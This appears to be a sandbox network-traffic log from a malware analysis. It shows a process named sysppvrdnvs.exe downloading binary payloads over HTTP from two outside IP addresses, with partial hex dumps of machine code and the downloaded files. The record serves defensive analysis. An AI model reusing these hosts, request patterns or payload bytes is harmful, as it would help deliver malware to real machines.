                                                                                                                                  Oct 28, 2024 11:11:12.754501104 CET1236INData Raw: 00 8b f0 8b 47 04 89 06 66 8b 4f 02 66 89 4e 04 8b 55 20 89 56 1c 83 c4 04 89 75 20 e8 c5 ce 00 00 8b 4c 24 14 8b 7c 24 18 89 46 08 8b 44 24 1c 50 51 e8 0f 05 00 00 83 c4 08 84 c0 74 75 53 8d a4 24 00 00 00 00 8b 4e 0c 83 f9 04 72 64 8b 46 18 8b
                                                                                                                                  Data Ascii: GfOfNU Vu L$|$FD$PQtuS$NrdF;wX}xttSWTAuD$$MPSWUNxF;uF+tP9RQA)~[_^]USV3W}\$OD$Phf@QD$
                                                                                                                                  Oct 28, 2024 11:11:12.754512072 CET1236INData Raw: 6a 01 8d 54 24 28 52 6a 04 66 89 44 24 1a c6 44 24 30 01 8b 46 08 68 ff ff 00 00 50 ff 15 18 02 41 00 8b 56 08 6a 10 8d 4c 24 10 51 52 ff 15 1c 02 41 00 83 f8 ff 75 12 56 e8 e4 fd ff ff 83 c4 04 5e 5b 33 c0 5f 83 c4 10 c3 6a 00 6a 00 56 68 00 11
                                                                                                                                  Data Ascii: jT$(RjfD$D$0FhPAVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;FvNPQFFFT$FWRP~;uF;vu]F[Ft;r+F][+n][W
                                                                                                                                  Oct 28, 2024 11:11:12.754523993 CET1236INData Raw: 3e 69 6c 63 69 75 07 8b c6 e8 00 03 00 00 8b 3d 34 01 41 00 ff d7 8b 74 24 0c 2b c6 3d e8 03 00 00 72 3e 8d 73 20 56 ff 15 f4 00 41 00 8b 7b 38 85 ff 74 24 83 bf 60 02 00 00 ff 74 16 8b bf 80 02 00 00 85 ff 75 ed 56 ff 15 f8 00 41 00 e9 80 00 00
                                                                                                                                  Data Ascii: >ilciu=4At$+=r>s VA{8t$`tuVAVAr+='rgC PAs8tBjVRXA+r`tPf`uC PA4AD$CjP`A_^[]
                                                                                                                                  Oct 28, 2024 11:11:12.754535913 CET1236INData Raw: 24 18 89 44 24 08 8b 87 70 02 00 00 89 54 24 1c 8b 97 7c 02 00 00 8d 4c 24 08 51 89 44 24 18 8b 46 28 52 b9 02 00 00 00 8b d7 89 44 24 28 e8 57 f8 ff ff 83 c4 08 5f 5e 83 c4 1c c3 83 c6 14 56 ff 15 64 00 41 00 6a 04 8d 54 24 2c 52 b8 01 00 00 00
                                                                                                                                  Data Ascii: $D$pT$|L$QD$F(RD$(W_^VdAjT$,RhfD$4`h3PufL$>A`QA`_^U- AVW|$jD$PGL$QT$ 3RPt$(t$ t$$L$;twSu*T$ RT$jD$ P
                                                                                                                                  Oct 28, 2024 11:11:12.754548073 CET1236INData Raw: 00 00 00 02 00 00 89 96 28 02 00 00 ff 15 fc 00 41 00 83 c7 3c 57 ff 15 5c 00 41 00 e8 35 fe ff ff 8b c6 5e 5b 5f 5d c3 56 e8 a8 87 00 00 83 c4 04 33 f6 55 e8 2d 91 00 00 83 c4 04 8b c6 5e 5b 5f 5d c3 cc cc cc 56 8b 74 24 08 85 f6 74 3a 81 3e 69
                                                                                                                                  Data Ascii: (A<W\A5^[_]V3U-^[_]Vt$t:>ilciu2tu)|@P\AL$tx^^UQj%EjMUMAUBE]UQEM
                                                                                                                                  Oct 28, 2024 11:11:12.754560947 CET1236INData Raw: 8b 11 52 e8 fa 82 00 00 83 c4 04 8b 45 08 c7 00 00 00 00 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 1c 8b 45 0c 25 ff ff 00 00 89 45 e4 8b 4d 0c c1 e9 10 81 e1 ff ff 00 00 89 4d ec 8b 55 10 81 e2 ff ff 00 00 89 55 fc 8b 45 10 c1
                                                                                                                                  Data Ascii: RE]UE%EMMUUE%EMMUEEEMMMUUUE;EsEEMUMEEMUEM;UsEEMMUJEHM
                                                                                                                                  Oct 28, 2024 11:11:12.754575968 CET672INData Raw: eb 07 c7 45 fc 00 00 00 00 8b 4d f8 8b 55 08 8b 04 8a 8b 4d f8 8b 55 10 03 04 8a 8b 4d f8 8b 55 08 89 04 8a 8b 45 f8 8b 4d 08 8b 55 f8 8b 75 10 8b 04 81 3b 04 96 73 09 8b 4d fc 83 c1 01 89 4d fc eb 82 8b 45 fc 5e 8b e5 5d c3 cc cc cc 55 8b ec 83
                                                                                                                                  Data Ascii: EMUMUMUEMUu;sMME^]UEEMMEUUE9EsMUEEEM;MUE<uMMUEEEEM;MU
                                                                                                                                  Oct 28, 2024 11:11:12.755492926 CET1236INData Raw: 00 00 00 80 c7 45 c8 00 00 00 00 eb 09 8b 55 c8 83 c2 01 89 55 c8 83 7d c8 20 73 1b 8b 45 fc 8b 4d 18 8b 54 81 fc 23 55 f4 74 02 eb 0a 8b 45 f4 d1 e8 89 45 f4 eb d6 8b 4d fc 51 8b 55 c8 52 8b 45 18 50 8b 4d 18 51 e8 d2 07 00 00 83 c4 10 89 45 f8
                                                                                                                                  Data Ascii: EUU} sEMT#UtEEMQUREPMQEUUREPMQUREEEMMUUEE}EMMUUELMUELQUREPMQE}t=EUUELM
                                                                                                                                  Oct 28, 2024 11:11:12.759903908 CET1236INData Raw: ec c7 45 e0 00 00 00 00 8b 45 f4 83 c0 01 89 45 d0 eb 09 8b 4d d0 83 c1 01 89 4d d0 8b 55 d0 3b 55 dc 0f 83 25 01 00 00 8b 45 f4 8b 4d 0c 8b 14 81 52 8b 45 d0 8b 4d 0c 8b 14 81 52 8d 45 f8 50 e8 95 f3 ff ff 83 c4 0c 8b 4d f8 81 e1 00 00 00 80 f7
                                                                                                                                  Data Ascii: EEEMMU;U%EMREMREPMMUUEEMMUUUEEEM;MsUUuEEMMMU;UsEEMMUEEMMUE;sMMu


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.449731185.215.113.66803060C:\Windows\sysppvrdnvs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 28, 2024 11:11:20.606060028 CET166OUTGET /1 HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                  Host: 185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.512868881 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Oct 2024 10:11:21 GMT
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Length: 110600
                                                                                                                                  Last-Modified: Mon, 28 Oct 2024 09:35:17 GMT
                                                                                                                                  Connection: keep-alive
                                                                                                                                  ETag: "671f5ad5-1b008"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                  Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                  Oct 28, 2024 11:11:21.512989998 CET1236INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                  Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu B
                                                                                                                                  Oct 28, 2024 11:11:21.513026953 CET1236INData Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18
                                                                                                                                  Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4
                                                                                                                                  Oct 28, 2024 11:11:21.513062000 CET1236INData Raw: c9 90 52 78 37 15 55 e7 3b 12 de 97 ad 09 08 34 9c f1 3e 5e eb 2a 63 8c 43 75 c5 71 82 c9 58 2a a4 3e cc f8 12 f3 7a b1 87 1d c5 f2 2b 58 69 da b0 8d c8 23 05 88 f5 df cf 88 ba 49 a6 1f bc 70 47 57 59 26 4d 98 3e 2e a6 8d 60 89 13 9e 54 9b 34 50
                                                                                                                                  Data Ascii: Rx7U;4>^*cCuqX*>z+Xi#IpGWY&M>.`T4PXsK,UG]-7%h,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|
                                                                                                                                  Oct 28, 2024 11:11:21.513096094 CET848INData Raw: 2d 5d 5d 9a a2 19 58 54 3f 1c 22 27 fe cc 6c ae 32 01 57 29 8c 43 bd f9 12 3a 50 2a 41 97 76 a7 d8 52 38 48 d8 e9 cd 74 59 bb d4 bf b6 10 02 29 f9 f4 15 10 c3 73 2a 5e da 1f b6 fe f8 51 3f f6 9f 7b 5a 9f 07 62 9c 14 01 e1 93 84 e8 4e b5 e0 0e b3
                                                                                                                                  Data Ascii: -]]XT?"'l2W)C:P*AvR8HtY)s*^Q?{ZbNg!WOxD%f~vp{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q
                                                                                                                                  Oct 28, 2024 11:11:21.513134003 CET1236INData Raw: e5 c7 48 fe 8e a5 32 e2 13 dd d2 2d 64 e7 e9 5c 6b 43 03 19 ca a8 00 64 ff 18 b9 f1 9d 4d d7 74 8b a0 5f 02 8f 37 31 12 8f 13 05 52 05 c3 aa 57 33 76 99 c9 a7 4c 1d 6e ef 86 cd 0c eb a3 b1 70 2a 37 e3 66 ec 2b 49 77 ef cf bf ce fb 36 71 50 84 c7
                                                                                                                                  Data Ascii: H2-d\kCdMt_71RW3vLnp*7f+Iw6qPRvW*fKA+SjAn3'>N.KD"A#1a"!(?$|%=e` 7ODu0Wn+NOayTvnB[4=}B!AS]v6jZD*&
                                                                                                                                  Oct 28, 2024 11:11:21.513168097 CET1236INData Raw: 2c ab a3 cb d3 d0 3b 48 ce 82 47 e8 01 6a cb db 94 a0 28 22 bb 49 f9 b3 d0 1e 4d 95 f8 48 88 81 e5 bc fb a8 de 10 1e 4d 86 3b 9d 22 c8 43 13 0a f6 0b 83 2a 40 3d 1e 6a 0b 90 01 d5 75 07 c4 a7 d8 73 9a 25 d4 87 54 8b 4f 20 f1 0b e3 71 55 5c 0c 60
                                                                                                                                  Data Ascii: ,;HGj("IMHM;"C*@=jus%TO qU\`kqz(d];N_v3CM<k#Hd-_qoMx-Uy`r(4#f||ZL!eyhK?7IXih2%E
                                                                                                                                  Oct 28, 2024 11:11:21.513204098 CET1236INData Raw: b7 eb d5 25 e2 56 5b 0d aa 58 ee a9 24 96 78 02 b1 03 d9 37 5a 27 c7 fa ab 02 4f b7 77 b8 d6 61 8c 11 cc 35 fe dd fa 9c b3 17 68 68 79 58 d6 91 26 cb cf cc ff bc 31 bd d3 10 2f e7 12 fb 76 06 2e ea b6 26 10 d4 f3 20 fe 37 f6 ff 94 8c ba 34 7d 80
                                                                                                                                  Data Ascii: %V[X$x7Z'Owa5hhyX&1/v.& 74}D~"}-TN.`"=aUNoPpy@U$f^{q[BHQ:>:v<DmA[M=NHI"={`!a}j&C'Xe^X.t
                                                                                                                                  Oct 28, 2024 11:11:21.513237953 CET1236INData Raw: 50 9e cf ff d3 40 7a c7 f8 42 fe 25 37 4f 5d 4e ab 8b 92 d7 c2 30 99 d2 ab 7d 9c ac c4 aa 17 1d 59 5a 32 3a b1 48 b2 25 c1 ba 3e 25 fb b4 69 81 ab bd 29 75 ad b7 45 ea 4c e5 76 80 3b fa ec 7c 6f 7c 12 70 36 2d 91 1c 84 79 29 65 62 2a 42 9f 21 88
                                                                                                                                  Data Ascii: P@zB%7O]N0}YZ2:H%>%i)uELv;|o|p6-y)eb*B!p;gaO)[4.W{6R,+*Yq3QqTS7d$6n^ ouj~0XvA$Eq<B7\#!``g~{(>i]D5n6EVl;7V
                                                                                                                                  Oct 28, 2024 11:11:21.513276100 CET1236INData Raw: 21 ea 20 8a db 04 95 75 c8 3d 17 76 c0 08 a4 6f 07 b0 c6 ab c4 f1 d5 fe b5 93 98 79 2e 09 cd 11 59 84 3d 04 a7 f1 c0 a4 3b 1e 22 b5 76 35 21 a8 3d ea 56 08 b8 ef 53 61 0d 1f 5d 2b 7f 33 16 8e 38 8e 34 bb 28 13 f4 8f c0 71 68 6b f4 63 25 63 92 07
                                                                                                                                  Data Ascii: ! u=voy.Y=;"v5!=VSa]+384(qhkc%c-7p0Q.7#A9<U3NW4:0T]Gl_Ht&:UP}u|C_/S0'n!C??&ol@ &d'C(!S"EYDXW
                                                                                                                                  Oct 28, 2024 11:11:21.518661022 CET1236INData Raw: d1 aa 3a 8f 5d c2 f2 31 d2 a0 d2 bb 0f 99 eb 94 1e 30 3c eb 7a b8 62 69 b4 5a 2c 8f 2e fb 1e 18 fa 28 dc 14 d4 cb 63 25 ac 74 b7 3a d6 9b 6f 04 e7 c2 7c 8b 2d f7 ea 3b 40 67 83 64 80 7c 71 df 88 2f 70 a1 a6 90 3f 78 8f 40 9c 12 94 75 f6 bd ef bf
                                                                                                                                  Data Ascii: :]10<zbiZ,.(c%t:o|-;@gd|q/p?x@uvO=dN^|QHQ]JeUfH*O!$Ge!F7v.2He"5mjr=4O5n@a%"6pj$7yZJcXwx!QH


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.449734185.215.113.66803060C:\Windows\sysppvrdnvs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 28, 2024 11:11:22.612062931 CET166OUTGET /1 HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                  Host: 185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515336037 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Oct 2024 10:11:23 GMT
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Length: 110600
                                                                                                                                  Last-Modified: Mon, 28 Oct 2024 09:35:17 GMT
                                                                                                                                  Connection: keep-alive
                                                                                                                                  ETag: "671f5ad5-1b008"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                  Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                  Oct 28, 2024 11:11:23.515369892 CET1236INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                  Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu B
                                                                                                                                  Oct 28, 2024 11:11:23.515388966 CET1236INData Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18
                                                                                                                                  Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4
                                                                                                                                  Oct 28, 2024 11:11:23.515410900 CET1236INData Raw: c9 90 52 78 37 15 55 e7 3b 12 de 97 ad 09 08 34 9c f1 3e 5e eb 2a 63 8c 43 75 c5 71 82 c9 58 2a a4 3e cc f8 12 f3 7a b1 87 1d c5 f2 2b 58 69 da b0 8d c8 23 05 88 f5 df cf 88 ba 49 a6 1f bc 70 47 57 59 26 4d 98 3e 2e a6 8d 60 89 13 9e 54 9b 34 50
                                                                                                                                  Data Ascii: Rx7U;4>^*cCuqX*>z+Xi#IpGWY&M>.`T4PXsK,UG]-7%h,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|
                                                                                                                                  Oct 28, 2024 11:11:23.515428066 CET1236INData Raw: 2d 5d 5d 9a a2 19 58 54 3f 1c 22 27 fe cc 6c ae 32 01 57 29 8c 43 bd f9 12 3a 50 2a 41 97 76 a7 d8 52 38 48 d8 e9 cd 74 59 bb d4 bf b6 10 02 29 f9 f4 15 10 c3 73 2a 5e da 1f b6 fe f8 51 3f f6 9f 7b 5a 9f 07 62 9c 14 01 e1 93 84 e8 4e b5 e0 0e b3
                                                                                                                                  Data Ascii: -]]XT?"'l2W)C:P*AvR8HtY)s*^Q?{ZbNg!WOxD%f~vp{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q
                                                                                                                                  Oct 28, 2024 11:11:23.515445948 CET1236INData Raw: 76 f8 eb 35 9a 49 f5 5f dc d3 37 59 0a e9 b8 e1 06 d3 e6 66 4b 04 7f 7b ee 03 3f 6a 27 e1 61 5e 8a b2 45 ed 6d b7 a8 9d 86 11 01 0f ff 78 01 fe 0d 80 ed c8 50 40 0b 73 80 eb b9 26 83 c3 d3 d3 ac 38 79 5a 41 ae 8b 77 07 a3 08 0e d9 8d 46 32 48 d1
                                                                                                                                  Data Ascii: v5I_7YfK{?j'a^EmxP@s&8yZAwF2HPN.Tz=p7g8Zc4H\lAv#N`'6Z\SBJ!rV20S{}rLdad+0hFaGv:;]ud8[H9PCE=Yd
                                                                                                                                  Oct 28, 2024 11:11:23.515465021 CET1236INData Raw: c0 ba f9 08 b0 e4 da 68 51 42 b9 b5 09 39 34 51 01 40 fa 4b 87 b4 59 52 e7 f0 45 99 02 36 a3 10 c6 09 75 00 a8 1e 88 ea 1e bf 16 50 e8 c8 cb d1 d0 12 62 9d 5e 26 51 2e a2 08 8b 75 e4 14 c9 1c 8c ef 0a b7 18 83 88 9c 47 30 5e 57 34 38 ba b4 ac 95
                                                                                                                                  Data Ascii: hQB94Q@KYRE6uPb^&Q.uG0^W48mh.z)|XV#%Y7myeXzOW075($Q?oXC(J7 L!Ce\_GMSqM#&@_(8@
                                                                                                                                  Oct 28, 2024 11:11:23.515484095 CET1236INData Raw: 7f e7 46 07 7b 45 ba 0f ee 7e d7 b8 cf a7 b1 02 ca aa 2a da f1 eb d7 1e 97 e4 5c 7d 47 49 81 f0 51 f0 4d f0 e5 ae 25 df c2 a8 ea 78 b4 2b de 24 76 83 e9 28 bd 6a c1 b9 99 9e 30 46 02 98 38 3e 82 1b 07 44 35 26 bd 09 6d 26 96 e4 dd f6 ed 1d 1a 17
                                                                                                                                  Data Ascii: F{E~*\}GIQM%x+$v(j0F8>D5&m&qyAWS<Ie9^0#8-PKY#"3T>G(~/ldX5rO6fPtL[^8R~_RPc-#YM(N
                                                                                                                                  Oct 28, 2024 11:11:23.515501022 CET1236INData Raw: 16 a5 d7 7a 4f 72 44 d1 e5 fd 4c a1 5a 78 0d d5 0b 65 9d fb 99 7c 2e 09 41 89 22 b8 82 c5 5d b5 ac 48 1a 84 d6 88 67 fd 2d c8 67 95 39 24 53 4e 67 9b f4 d2 15 a3 b7 2b 23 3e 72 20 98 df fd 5a 19 cf dc e8 f4 fc 47 8d 9b f5 bf 2b c9 1d c2 d5 c2 74
                                                                                                                                  Data Ascii: zOrDLZxe|.A"]Hg-g9$SNg+#>r ZG+t=DLIU^[YA]Fg&k~u)}{fQ_y\PfC\UcI%+15&tB5x`:Az?]Y@3y:`i_=E#|!4
                                                                                                                                  Oct 28, 2024 11:11:23.515521049 CET1236INData Raw: f4 c7 09 df ba 72 0b b8 b5 94 4a 02 0c 08 2b fe b2 29 61 ca 08 3d 62 b8 7f f8 78 a8 89 3c 6f e5 67 d8 ea 81 a9 4e 5e 3a 68 8c 06 23 ab 63 72 64 e4 e5 96 13 b0 ef 80 ff 6a 4b 68 f5 23 e2 00 18 28 5d f0 9e 1f 3a 94 62 1d c5 03 02 dc cc 42 d7 33 c2
                                                                                                                                  Data Ascii: rJ+)a=bx<ogN^:h#crdjKh#(]:bB3EM]9^>Ja[3Z&B,`ZcOq[W<!qk5/0.G`3qbj~'k7rYX{=-]K/&)o,d*)"g%?R. x>
                                                                                                                                  Oct 28, 2024 11:11:23.520992041 CET1120INData Raw: a2 83 16 9b b9 fb 69 9b ea 52 ae 0c 90 8f 67 91 6c 4a cf 7d 7e 4d 08 7b ee e4 4b d5 63 b5 a1 67 0f 45 2f a9 9e 1f 16 53 4d a3 96 9d f1 4f d9 40 e7 ae ac 34 a5 6d 1b 60 b6 4d 0b bb 23 1c 57 24 3e 92 e6 34 51 18 1c 76 0c 5f 27 63 a0 7f cb 9d b1 27
                                                                                                                                  Data Ascii: iRglJ}~M{KcgE/SMO@4m`M#W$>4Qv_'c'6WgFezegT~@X=TL6bs:*n]:Cuj+JM,`!"\~Is%id~$-Ac&)\l[(o?=p\7?hH&h


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.44974091.202.233.141803060C:\Windows\sysppvrdnvs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 28, 2024 11:11:25.596575022 CET171OUTGET /dwntbl HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                  Host: 91.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.495398998 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Oct 2024 10:11:26 GMT
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Length: 85760
                                                                                                                                  Last-Modified: Thu, 10 Oct 2024 07:40:46 GMT
                                                                                                                                  Connection: keep-alive
                                                                                                                                  ETag: "670784fe-14f00"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 73 9b e7 57 5d 0f d3 d2 df 96 5f cd 0b 7c 4f ed 0c 59 d0 57 11 1e d2 e1 d7 80 f2 d5 71 10 6a 2a 87 07 22 a6 6e cb ec f0 12 2b 90 48 7c 5c 16 07 b9 45 84 db 5b 0a 45 14 0a 85 27 cc d7 59 7c da 9a 7b 65 fc bd 3a fa 59 0e 93 5d 05 00 75 cc 1f a7 e0 58 a4 00 6a 1d 1a 9d b3 52 e6 b5 0f 65 00 37 82 7e 11 70 29 d8 ff d3 7f 78 7e e8 6a b3 03 74 22 aa 75 0a 3e 4e 93 86 8f b5 6a 07 3e c5 d8 6b 40 22 08 93 91 df a9 65 51 ba ae b8 e0 c8 6f 4e 8c ac e2 9d 3b 24 34 1b 93 8f f4 78 b3 6e 76 b5 c4 13 f7 e3 32 60 41 bf 53 cc 98 0b f3 1a bf 74 bd 52 b8 1c 29 4f e9 c4 e2 82 d4 b2 f8 b7 0a 11 b2 be a8 25 a0 53 0e d1 ce da 31 eb 63 a9 59 c5 1f 8a d9 02 58 af ae c8 c9 d4 fa d3 e8 9f 75 1b 4e af 82 94 08 2a 54 0b 9a 60 cf 58 b6 57 56 bd c6 0a 54 8a e6 70 e6 66 05 db 03 84 b9 2b 25 e7 7b 25 5d 50 e3 db c0 7a dc 3b dd 8d e0 cf f1 1f e1 7a ed 83 b6 92 25 c6 22 b1 a6 c3 ae 1b b6 56 0f 7a 67 5a 13 cb 6a f1 c9 f6 7f eb a8 9e 1a 49 3b fa 62 7a f9 8f 2e 10 81 4d 4d 62 d8 b2 c0 62 35 68 1b e3 19 6d 92 6f e9 25 00 d2 91 21 07 4d 9d [TRUNCATED]
